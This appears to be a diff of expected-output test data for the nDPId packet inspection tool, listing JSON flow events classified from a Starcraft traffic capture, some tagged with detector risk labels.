-00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1437389982140,"flow_last_seen":1437389982442,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":519,"flow_tot_l4_payload_len":656,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3518,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1437389982269,"flow_last_seen":1437389982443,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":463,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3519,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1437389983663,"flow_last_seen":1437389983964,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":515,"flow_tot_l4_payload_len":654,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3521,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1437389983788,"flow_last_seen":1437389983963,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2996,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3522,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1437389985308,"flow_last_seen":1437389985615,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":491,"flow_tot_l4_payload_len":638,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3523,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1437389985320,"flow_last_seen":1437389985635,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":499,"flow_tot_l4_payload_len":644,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3524,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1437389985434,"flow_last_seen":1437389985610,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3255,"flow_avg_l4_payload_len":271,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.40","src_port":3525,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1437389985446,"flow_last_seen":1437389985631,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3062,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.40","src_port":3526,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1437389981197,"flow_last_seen":1437389981500,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":515,"flow_tot_l4_payload_len":654,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3515,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1437389981330,"flow_last_seen":1437389981497,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2996,"flow_avg_l4_payload_len":249,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3516,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1437389982140,"flow_last_seen":1437389982442,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":519,"flow_tot_l4_payload_len":656,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3518,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1437389982269,"flow_last_seen":1437389982443,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":463,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3519,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1437389983663,"flow_last_seen":1437389983964,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":515,"flow_tot_l4_payload_len":654,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3521,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1437389983788,"flow_last_seen":1437389983963,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2996,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3522,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1437389985308,"flow_last_seen":1437389985615,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":491,"flow_tot_l4_payload_len":638,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3523,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1437389985320,"flow_last_seen":1437389985635,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":499,"flow_tot_l4_payload_len":644,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3524,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1437389985434,"flow_last_seen":1437389985610,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3255,"flow_avg_l4_payload_len":271,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.40","src_port":3525,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1437389985446,"flow_last_seen":1437389985631,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3062,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.40","src_port":3526,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1437389955670,"flow_last_seen":1437389984611,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"173.194.40.22","dst_ip":"192.168.1.100","src_port":443,"dst_port":53568,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Google","breed":"Acceptable","category":"Web"}} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1437389955670,"flow_last_seen":1437389984611,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"173.194.40.22","dst_ip":"192.168.1.100","src_port":443,"dst_port":53568,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389982769,"flow_last_seen":1437389982823,"flow_idle_time":200000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"5.42.180.154","src_port":53146,"dst_port":1119,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Starcraft","breed":"Fun","category":"Game"}} 00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389982769,"flow_last_seen":1437389982823,"flow_idle_time":200000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"5.42.180.154","src_port":53146,"dst_port":1119,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968610,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"199.38.164.156","src_port":3486,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968610,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"199.38.164.156","src_port":3486,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1437389963466,"flow_last_seen":1437389963469,"flow_idle_time":200000,"flow_min_l4_payload_len":372,"flow_max_l4_payload_len":452,"flow_tot_l4_payload_len":4522,"flow_avg_l4_payload_len":411,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"239.255.255.250","src_port":38605,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00937{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":179,"flow_first_seen":1437389964790,"flow_last_seen":1437389968014,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":124502,"flow_avg_l4_payload_len":695,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"87.248.221.254","src_port":3508,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1437389963466,"flow_last_seen":1437389963469,"flow_idle_time":200000,"flow_min_l4_payload_len":372,"flow_max_l4_payload_len":452,"flow_tot_l4_payload_len":4522,"flow_avg_l4_payload_len":411,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"239.255.255.250","src_port":38605,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00937{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":179,"flow_first_seen":1437389964790,"flow_last_seen":1437389968014,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":124502,"flow_avg_l4_payload_len":695,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"87.248.221.254","src_port":3508,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"}} 00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389954123,"flow_last_seen":1437389954123,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"80.239.186.26","dst_ip":"192.168.1.100","src_port":443,"dst_port":3476,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389954123,"flow_last_seen":1437389954123,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"80.239.186.26","dst_ip":"192.168.1.100","src_port":443,"dst_port":3476,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389955642,"flow_last_seen":1437389955642,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"80.239.186.40","dst_ip":"192.168.1.100","src_port":443,"dst_port":3478,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389955642,"flow_last_seen":1437389955642,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"80.239.186.40","dst_ip":"192.168.1.100","src_port":443,"dst_port":3478,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00815{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389953741,"flow_last_seen":1437389953805,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":264,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58818,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"23": {"risk":"Suspicious DNS Traffic","severity":"High","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389954543,"flow_last_seen":1437389954714,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58831,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1437389955747,"flow_last_seen":1437389955800,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58844,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389956550,"flow_last_seen":1437389956605,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":287,"flow_avg_l4_payload_len":71,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58851,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00694{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1437389967432,"flow_last_seen":1437389968027,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"12.129.222.54","src_port":3512,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.WorldOfWarcraft","breed":"Fun","category":"Game"}} +00815{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389953741,"flow_last_seen":1437389953805,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":264,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58818,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"23": {"risk":"Suspicious DNS Traffic","severity":"High","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389954543,"flow_last_seen":1437389954714,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58831,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1437389955747,"flow_last_seen":1437389955800,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58844,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389956550,"flow_last_seen":1437389956605,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":287,"flow_avg_l4_payload_len":71,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58851,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 